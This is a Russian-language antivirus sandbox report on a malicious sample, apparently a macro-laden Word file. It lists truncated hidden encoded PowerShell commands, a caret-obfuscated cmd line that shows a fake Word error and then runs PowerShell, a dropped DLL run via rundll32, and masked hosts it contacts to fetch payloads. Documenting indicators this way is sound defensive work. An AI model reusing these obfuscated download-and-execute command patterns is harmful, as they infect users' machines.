Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enc UwBFAFQALQBpAFQAZQBtACAAIABWAGEAcgBJAEEAQgBMAEUAOgBoADMANABaADUAOAAgACgAIABbAHQAWQBQAEUAXQAoACIAewAyAH0AewA0AH0AewAzAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAWQAnACwAJwBjA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\m64pcdm\qjabqbm\e09o.dll
Сетевая активность
Подключается к
- 'es#####rconsulting.com':80
- 'es#####rconsulting.com':443
- 'ae###imes.com':80
- 'de.#####ompareonline.com':80
TCP
Запросы HTTP GET
- http://www.es#####rconsulting.com/wp-includes/I/
- http://ae###imes.com/wp-admin/44Z/
- http://de.#####ompareonline.com/cgi-bin/ztEE/
Другие
- 'es#####rconsulting.com':443
UDP
- DNS ASK es#####rconsulting.com
- DNS ASK ae###imes.com
- DNS ASK ra###uma.com
- DNS ASK de.#####ompareonline.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQALQBpAFQAZQBtACAAIABWAGEAcgBJAEEAQgBMAEUAOgBoADMAN...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\M64pcdm\Qjabqbm\E09O.dll AnyString
